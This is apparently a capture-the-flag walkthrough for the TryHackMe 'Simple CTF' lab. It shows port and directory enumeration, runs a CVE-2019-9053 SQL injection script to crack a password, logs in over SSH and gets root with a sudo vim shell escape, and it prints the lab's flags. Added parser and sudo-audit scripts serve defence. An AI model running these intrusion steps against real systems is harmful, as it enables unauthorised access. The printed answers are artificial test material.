
Simple CTF Walkthrough

Discover the step-by-step solution for the Simple CTF challenge on TryHackMe.


Enumeration

sudo nmap -sT -sV -A -p- 10.10.134.123 -oN enum.txt

Result:

Nmap scan report for 10.10.134.123
Host is up (0.20s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.23.178.131
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|2.6.X|3.X|5.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:4.15 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 (97%), Linux 4.4 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (91%), Linux 3.10 - 3.13 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   241.40 ms 10.23.0.1
2   241.53 ms 10.10.134.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

The question asks about services under port 1000, i.e. the ports below it; the scan above (or a rescan limited to that range, sudo nmap -sT -sV -A -p 1-1000 10.10.134.123) shows two of them, FTP on 21 and HTTP on 80, so:

💡
How many services are running under port 1000? 2
💡
What is running on the higher port? ssh (running on port 2222)
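To answer the two enumeration questions from the saved enum.txt instead of by eye, and to pick up the anonymous-FTP finding noted at the end of this walkthrough, here is an added Python parser for nmap's normal (-oN) output. It is example code written for this page, not part of the walkthrough; the embedded sample is trimmed from the scan report above.

```python
import re
from dataclasses import dataclass, field

# Port line in nmap's normal (-oN) output, e.g. "21/tcp   open  ftp     vsftpd 3.0.3"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script lines start with "| " or "|_" and belong to the port line above them
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")

@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str = ""
    notes: list = field(default_factory=list)  # NSE findings, e.g. "anonymous-ftp"

def parse_nmap(text):
    """Extract the port table, with attached NSE findings, from -oN output."""
    ports, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m[1]), m[2], m[3], m[4], (m[5] or "").strip())
            ports.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None and "Anonymous FTP login allowed" in m[1]:
            current.notes.append("anonymous-ftp")  # the ftp-anon script fired
    return ports

def open_below(ports, limit):
    """Open ports numbered below limit (the 'under port 1000' question)."""
    return [p for p in ports if p.state == "open" and p.number < limit]

def highest_open(ports):
    """The open port with the largest number (the 'higher port' question)."""
    return max((p for p in ports if p.state == "open"), key=lambda p: p.number, default=None)

# Sample trimmed from the scan report above (constructed for this example)
SAMPLE = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
"""
```

Run parse_nmap on the contents of enum.txt and the two helpers return the counts the questions ask for, while the notes field carries the anonymous-FTP flag for the FTP port.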

Dir Enum

Using gobuster, dirb or any similar tool (I'm going with dirb):

dirb http://10.10.134.123

Result:

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.134.123/ ----
+ http://10.10.134.123/index.html (CODE:200|SIZE:11321)
+ http://10.10.134.123/robots.txt (CODE:200|SIZE:929)
+ http://10.10.134.123/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.134.123/simple/

---- Entering directory: http://10.10.134.123/simple/ ----
==> DIRECTORY: http://10.10.134.123/simple/admin/
==> DIRECTORY: http://10.10.134.123/simple/assets/
==> DIRECTORY: http://10.10.134.123/simple/doc/
+ http://10.10.134.123/simple/index.php (CODE:200|SIZE:19993)
==> DIRECTORY: http://10.10.134.123/simple/lib/
==> DIRECTORY: http://10.10.134.123/simple/modules/
==> DIRECTORY: http://10.10.134.123/simple/tmp/
==> DIRECTORY: http://10.10.134.123/simple/uploads/

---- Entering directory: http://10.10.134.123/simple/admin/ ----
+ http://10.10.134.123/simple/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.134.123/simple/admin/lang/

If we open http://10.10.134.123/simple/ we will find the CMS page, including its version.

A quick search for this CMS version turns up CVE-2019-9053.

💡
What's the CVE you're using against the application? CVE-2019-9053

The vulnerability details show that the application is vulnerable to SQL injection.

💡
To what kind of vulnerability is the application vulnerable? sqli

SQL Injection

  • The exploit script, written in Python 2, can be found here

  • The 10k most common passwords wordlist can be found here

python CVE-2019-9053.py -u http://10.10.2.28/simple/ --crack -w 10k-most-common.txt

💡
What's the password? secret

SSH

Using the username mitch and the password secret, we try to log in via SSH on port 2222:

ssh -p 2222 mitch@10.10.134.123

That works; we now have SSH access as mitch.

💡
What's the user flag? G00d j0b, keep up!

💡
Is there any other user in the home directory? What's its name? sunbath

Privilege escalation

Run sudo -l to list the commands we can execute with root privileges.

💡
What can you leverage to spawn a privileged shell? vim

Go to https://gtfobins.github.io/ to find how to escalate using vim

sudo vim -c ':!/bin/sh'

Now we have a root shell.

Inside /root we can find root.txt.

💡
What's the root flag? W3ll d0n3. You made it!
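From the defender's side, the same sudo -l listing can be audited automatically. The following Python script is an added example (not from the walkthrough) that parses sudo -l output and flags rules granting ALL or a binary with a shell escape such as vim; the sample listing is constructed, and the hostname Machine is a placeholder.

```python
import re

# Binaries that let the invoker spawn a shell when run via sudo (the walkthrough's
# vim -c ':!/bin/sh' is one instance). Only the page's example is listed here;
# extend it from the GTFOBins sudo category the walkthrough links to.
SHELL_ESCAPE_BINS = {"vim", "vi"}

# One `sudo -l` command entry: "(root) NOPASSWD: /usr/bin/vim, /bin/ls"
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.*)$")

def parse_sudo_l(text):
    """Return (runas, tags, commands) tuples from `sudo -l` output."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_cmds = True  # entries follow this header; Defaults lines above are skipped
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m[2].split()}
        cmds = [c.strip() for c in m[3].split(",") if c.strip()]
        entries.append((m[1].strip(), tags, cmds))
    return entries

def audit(entries):
    """Flag rules that grant ALL or a binary with a known shell escape."""
    findings = []
    for runas, tags, cmds in entries:
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((cmd, "critical", f"unrestricted sudo as {runas}"))
            elif binary in SHELL_ESCAPE_BINS:
                why = f"{binary} can spawn a shell as {runas}; use sudoedit or a fixed-argument wrapper"
                if "NOPASSWD" in tags:
                    why += " (no password required)"
                findings.append((cmd, "high", why))
    return findings

# Constructed sample in the format `sudo -l` prints; hostname is a placeholder
SAMPLE = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /bin/systemctl restart apache2
"""
```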

Additional vulnerability found

FTP:

Anonymous FTP login is allowed (see the ftp-anon result in the scan above).

The listing contains a file named ForMitch.txt; download it with get.